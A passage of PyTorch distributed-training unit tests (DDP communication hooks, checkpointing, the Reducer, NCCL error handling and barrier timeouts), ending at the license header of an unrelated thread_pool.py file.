self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
@requires_gloo()
def test_ddp_invalid_comm_hook_init(self):
"""
This unit test makes sure that register_comm_hook properly checks the format
of hook defined by user. The Python hook must be callable. This test also
checks whether bucket annotation checked properly if defined.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
with self.assertRaisesRegex(TypeError, "Communication hook must be callable."):
model.register_comm_hook(state=None, hook=1)
with self.assertRaisesRegex(
ValueError, "bucket annotation should be dist.GradBucket."
):
def comm_hook(state: object, bucket: int) -> torch.futures.Future:
return torch.futures.Future()
model.register_comm_hook(state=None, hook=comm_hook)
@requires_gloo()
def test_ddp_invalid_comm_hook_return_type(self):
"""
This test checks whether return annotation checked properly if defined. It also
checks whether an internal error is thrown if return type is incorrect and user
hasn't specified any return type annotation.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
with self.assertRaisesRegex(
ValueError,
"Communication hook: return annotation should be torch.futures.Future or torch._C.Future.",
):
def comm_hook(state: object, bucket: dist.GradBucket) -> int:
return torch.futures.Future()
model.register_comm_hook(state=None, hook=comm_hook)
with self.assertRaisesRegex(
RuntimeError,
"callback must return a torch.futures.Future or torch._C.Future object, but got",
):
def comm_hook(state: object, bucket: dist.GradBucket):
return 1
model.register_comm_hook(state=None, hook=comm_hook)
# Run forward
output = model(8, self.rank)
# Run backward
output.mean().backward()
@requires_gloo()
def test_ddp_comm_hook_register_just_once(self):
"""
DDP communication hook can only be registered once. This test validates whether
the error is thrown properly when register_comm_hook is called more than once.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
def dummy_hook(state, bucket):
fut = torch.futures.Future()
fut.set_result([bucket.get_tensor()])
return fut
model.register_comm_hook(None, dummy_hook)
with self.assertRaisesRegex(
RuntimeError,
"register_comm_hook or register_builtin_comm_hook can only be called once.",
):
model.register_comm_hook(None, dummy_hook)
@requires_gloo()
def test_ddp_comm_hook_sparse_gradients(self):
"""
Runs "test_sparse_gradients" unit test with DDP communication hook. We define a
simple hook that does allreduce and works with gloo backend for this test.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Ensure initialized weights and inputs are identical across processes
torch.manual_seed(1337)
vanilla_model = SparseGradientModule()
ddp_model = DistributedDataParallel(
copy.deepcopy(vanilla_model),
process_group=process_group,
)
# "get_future" API does not support gloo backend, see GH Issue #42048.
# Instead, we wait for an allreduce work, and write its result to a Future.
def allreduce_hook_gloo(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
# Prepare allreduced grad bucket tensors by running an async work.
work = process_group.allreduce([bucket.get_tensor()])
work.wait()
fut = torch.futures.Future()
fut.set_result([bucket.get_tensor() / self.world_size])
return fut
ddp_model.register_comm_hook(None, allreduce_hook_gloo)
self._run_and_verify_sparse_gradients(vanilla_model, ddp_model)
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
size = 2048 * 2048
dev = self.rank
world = self.world_size
p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
m = torch.nn.Sequential(self.AcceptsParam(p, dev + 1),
self.AcceptsParam(p, dev + 1)).cuda(dev)
m = torch.nn.parallel.DistributedDataParallel(m,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[dev],
process_group=process_group)
for i in range(3):
m.zero_grad(set_to_none=try_set_to_none)
m(1).sum().backward()
# Each param value is multiplied by "rank + 1" twice in forward, so the grad
# values produced by a particular rank should be 2. * (rank + 1).
# Summing these over ranks and dividing by world size gives the expected result:
analytic = torch.full_like(p, 2. * (world * (world + 1.) / 2.) / world, device=dev)
for name, p in m.named_parameters():
self.assertEqual(p.grad, analytic, "mismatch at " + name + ".grad for " +
"set_to_none = {}, use_bucket_view = {}".format(try_set_to_none,
use_bucket_view))
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are referred to
# https://github.com/facebookresearch/fairscale/blob/master/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(2000, 2000)
self.l2 = nn.Linear(2000, 2000)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _test_ddp_checkpointing(self, checkpoint_once, process_group, use_bucket_view, find_unused_parameters=False):
# to reprodce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
if checkpoint_once:
model = self.CheckpointOnceModule().cuda()
else:
model = self.CheckpointTwiceModule().cuda()
model = nn.parallel.DistributedDataParallel(model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters)
input_tensor = torch.rand((64, 2000), device="cuda", requires_grad=True)
output_tensor = model(input_tensor)
output_tensor.sum().backward()
return model
# DDP works as expect when layer is checkpointed only once
@requires_nccl()
@unittest.skip("TODO: Test is always failing - https://github.com/pytorch/pytorch/issues/55071")
def test_ddp_checkpointing_once(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
model = self._test_ddp_checkpointing(checkpoint_once=True,
process_group=process_group,
use_bucket_view=use_bucket_view)
norm = 0.0
for p in model.parameters():
self.assertTrue(p.grad is not None)
norm += p.grad.norm().item()
assert numpy.allclose(norm, 78053), norm
# DDP will fail when there are unused_parameters in the model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_unused_params(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(checkpoint_once=True,
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True)
# DDP will fail when the same layer is checkponted twice
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(checkpoint_once=False,
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True)
# DDP works as expected if there is weight sharing among layers
@requires_nccl()
@unittest.skip("TODO: Test is always failing - https://github.com/pytorch/pytorch/issues/55071")
def test_ddp_checkpointing_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
torch.cuda.set_device(self.rank)
for use_bucket_view in (True, False):
torch.manual_seed(31415)
l1 = nn.Linear(2000, 2000)
l2 = nn.Linear(2000, 2000)
l1.weight = l2.weight
model = nn.Sequential(l1, l2).cuda()
model = nn.parallel.DistributedDataParallel(model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group)
input_tensor = torch.rand((64, 2000), device="cuda", requires_grad=True)
output_tensor = checkpoint(model, input_tensor)
output_tensor.sum().backward()
norm = 0.0
for p in model.parameters():
self.assertTrue(p.grad is not None)
norm += p.grad.norm().item()
assert numpy.allclose(norm, 57004), norm
class ReducerModule(nn.Module):
def __init__(self):
super(ReducerModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, use_fc3=True):
x = self.relu(self.fc1(x)).float()
x = self.relu(self.fc2(x)).float()
if use_fc3:
x = self.fc3(x).float()
return F.softmax(x, dim=1)
@requires_gloo()
class ReducerTest(TestCase):
def setUp(self):
self.file = tempfile.NamedTemporaryFile(delete=False)
self.store = c10d.FileStore(self.file.name, 1)
self.process_group = c10d.ProcessGroupGloo(self.store, 0, 1)
def test_single_dtype_single_bucket(self):
model = ReducerModule()
parameters = list(model.parameters())
buckets = [list(range(len(parameters)))]
dist.Reducer([parameters], buckets, self.process_group)
def _create_mixed_precision_model(self):
model = ReducerModule()
model.float()
model.fc1.double()
return model
def test_multi_dtype_single_bucket(self):
model = self._create_mixed_precision_model()
# Raise if there are multiple types per bucket.
# In this case we create one bucket for all parameters.
with self.assertRaises(RuntimeError):
parameters = [list(model.parameters())]
buckets = [list(range(len(parameters[0])))]
dist.Reducer(parameters, buckets, self.process_group)
def test_multi_dtype_multi_bucket(self):
model = self._create_mixed_precision_model()
parameters = [list(model.parameters())]
group_by_dtype = groupby(
range(len(parameters[0])), key=lambda i: parameters[0][i].dtype
)
buckets = [list(indices) for _, indices in group_by_dtype]
dist.Reducer(parameters, buckets, self.process_group)
def _create_reducer_for_models(self, models, find_unused_parameters=False):
parameters = [list(model.parameters()) for model in models]
group_by_dtype = groupby(
range(len(parameters[0])), key=lambda i: parameters[0][i].dtype
)
buckets = [list(indices) for _, indices in group_by_dtype]
return dist.Reducer(
parameters,
buckets,
self.process_group,
find_unused_parameters=find_unused_parameters,
)
def test_reducer_no_multi_replicas(self):
num_replicas = 2
models = [self._create_mixed_precision_model() for _ in range(num_replicas)]
with self.assertRaisesRegex(
RuntimeError,
"Expected exactly one model replica.",
):
reducer = self._create_reducer_for_models(models)
def test_forward_backward(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model])
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
output = loss(model(input), target)
reducer.prepare_for_backward(output)
output.backward()
def test_forward_backward_unused_parameters(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model], find_unused_parameters=True)
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
output = loss(model(input, use_fc3=False), target)
# Check that the grad of fc3 is not set.
self.assertEqual(None, model.fc3.weight.grad)
# Compute and accumulate gradients.
reducer.prepare_for_backward(output)
output.backward()
# The reducer will have marked the grad of fc3 as ready, because
# it doesn't show up in the autograd graph of `output`. Since fc3.weight
# is considered being globally unused, it will be kept untouched as None.
self.assertEqual(None, model.fc3.weight.grad)
def test_forward_backward_optimizer(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model], find_unused_parameters=True)
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters())
for i in range(3):
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# The `zero_grad` function calls `detach_` and `zero_` on the grad
# tensors of model parameters. If we tried to set the grad tensors
# to a view of the reducer's bucket tensors, this would blow up.
optimizer.zero_grad()
# Unused parameter only in the first iteration.
output = loss(model(input, use_fc3=(i > 0)), target)
reducer.prepare_for_backward(output)
output.backward()
optimizer.step()
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result = dist._compute_bucket_assignment_by_size(tensors, [400])
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result = dist._compute_bucket_assignment_by_size(tensors, [400])
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result = dist._compute_bucket_assignment_by_size(tensors, [40, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result = dist._compute_bucket_assignment_by_size(tensors, [200, 400])
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class NcclErrorHandlingTest(MultiProcessTestCase):
def setUp(self):
super(NcclErrorHandlingTest, self).setUp()
# Need to skip return code checking for these tests since the child
# processes don't exit cleanly.
self.skip_return_code_checks = [
self.test_nccl_errors_blocking_abort.__wrapped__,
self.test_nccl_errors_blocking_sigkill.__wrapped__,
self.test_nccl_errors_blocking_sigterm.__wrapped__,
self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
]
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._fork_processes()
def tearDown(self):
super(NcclErrorHandlingTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 3
@property
def blocking_wait_error_msg(self):
return "Caught collective operation timeout"
def _run_all_reduce(self, pg):
pg.allreduce(torch.rand(10).cuda(self.rank))
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_nonblocking(self):
# Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
# since test_c10d runs with async error handling by default, but this
# tests behavior when it is not enabled.
prev_nccl_async_error_handling = os.environ.get("NCCL_ASYNC_ERROR_HANDLING", None)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
# This allreduce does not block Python thread as allreduce enqueues
# the cuda operation, and then wait only blocks the current cuda
# stream.
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
work.wait()
# Now the work scheduled next should hang forever since the previous
# allreduce will never complete.
t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
t.daemon = True
t.start()
t.join(int(get_timeout(self.id()) / 5))
self.assertTrue(t.is_alive())
if prev_nccl_async_error_handling is not None:
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = prev_nccl_async_error_handling
def _test_nccl_errors_blocking(self, func):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# Operation would time out in blocking mode.
work.wait()
# Run some GPU operations to make sure cuda has not gotten stuck.
# It was observed cuda could get stuck if NCCL communicators were
# not properly aborted before throwing RuntimeError.
a = torch.rand(10).cuda(self.rank)
elif self.rank == 1:
# Clean up structures (ex: files for FileStore before going down)
del process_group
func()
else:
# Wait for timeout
time.sleep(2 * self.op_timeout_sec)
# Now verify communicators on this rank have been aborted by the watchdog thread.
self._wait_for_comm_abort(process_group)
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_clean_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(0))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_nonzero_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(1))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_abort(self):
self._test_nccl_errors_blocking(lambda: os.abort())
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigkill(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigterm(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_blocking_wait_with_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.barrier().wait()
if self.rank == 0:
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# This should timeout
process_group.barrier().wait()
def _run_invalid_nccl_blocking_wait_env(self, val):
os.environ["NCCL_BLOCKING_WAIT"] = val
store = c10d.FileStore(self.file_name, self.world_size)
with self.assertRaises(RuntimeError):
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_invalid_nccl_blocking_wait_env(self):
self._run_invalid_nccl_blocking_wait_env("abc")
self._run_invalid_nccl_blocking_wait_env("-1")
self._run_invalid_nccl_blocking_wait_env("2147483647")
self._run_invalid_nccl_blocking_wait_env("4294967295")
def _wait_for_comm_abort(self, process_group):
"""
Waits for the watchdog thread to abort communicators for the process group.
"""
while True:
try:
process_group.allreduce(torch.rand(10).cuda(self.rank))
except Exception as e:
if "NCCL communicator was aborted" in str(e):
return
else:
raise e
time.sleep(1)
@with_nccl_blocking_wait
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_nccl_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
# Initialize process_group.
timeout = 1
process_group = c10d.ProcessGroupNCCL(
store, self.rank, self.world_size, timeout=timedelta(seconds=timeout)
)
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
if self.rank == 0:
# This should timeout in about 1 second.
start = time.time()
# Watchdog may abort timed out work resulting in NCCL error instead of operation timed out.
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
else:
# Sleep to ensure timeout.
time.sleep(2 * timeout)
self._wait_for_comm_abort(process_group)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class CommTest(MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
# The tensors to pass to broadcast are idential to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_gloo_cuda(self):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
device = torch.device("cuda:%d" % self.rank)
ranks = list(range(self.world_size))
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
def test_broadcast_coalesced_gloo_cpu(self):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
device = torch.device("cpu")
ranks = list(range(self.world_size))
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
def test_pass_gloo_options(self):
pg_opts = c10d.ProcessGroupGloo.Options()
pg_opts.timeout = timedelta(seconds=10)
pg_opts._devices = [create_device(interface=LOOPBACK)]
pg_opts._threads = 2
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
"gloo",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts
)
default_pg = c10d.distributed_c10d._get_default_group()
# Test properly set devices on options if user don't set devices
no_device_thread_pg_opts = c10d.ProcessGroupGloo.Options(timeout=timedelta(seconds=10))
no_device_thread_pg = dist.new_group([0, 1], pg_options=no_device_thread_pg_opts)
self.assertTrue(len(no_device_thread_pg.options._devices) != 0)
# ensure created pg have the correct timeout set instead of default time out
self.assertEqual(no_device_thread_pg.options.timeout, timedelta(seconds=10))
# Test if user pass in Options, set threads, but not set devices, should error out
no_device_pg_opts = c10d.ProcessGroupGloo.Options(timeout=timedelta(seconds=10))
no_device_pg_opts._threads = 4
with self.assertRaisesRegex(
RuntimeError, "threads and devices must be passed in together"
):
no_device_pg = dist.new_group([0, 1], pg_options=no_device_pg_opts)
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
@requires_gloo()
def test_pass_gloo_options_and_timeout(self):
pg_opts = c10d.ProcessGroupGloo.Options()
pg_opts.timeout = timedelta(seconds=10)
store = c10d.FileStore(self.file_name, self.world_size)
# Test timeout and pg_options both set, should error out
with self.assertRaisesRegex(
RuntimeError, "timeout value defined in pg_options are conflicting"
):
dist.init_process_group(
"gloo",
world_size=self.world_size,
rank=self.rank,
store=store,
timeout=timedelta(20),
pg_options=pg_opts
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
# test if the process group constructed with high priority stream
self.assertTrue(pg.options.is_high_priority_stream)
# test the process group works as expected
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
@requires_gloo()
def test_gloo_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="gloo", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "device_ids not supported"):
c10d.barrier(device_ids=[self.rank])
def test_distributed_debug_mode(self):
# Default should be off
default_debug_mode = dist._get_debug_mode()
self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
mapping = {
"OFF": dist._DistributedDebugLevel.OFF,
"INFO": dist._DistributedDebugLevel.INFO,
"DETAIL": dist._DistributedDebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
set_debug_mode = dist._get_debug_mode()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "to be one of"):
dist._get_debug_mode()
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
thread_pool.py
|
#
# Copyright 2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
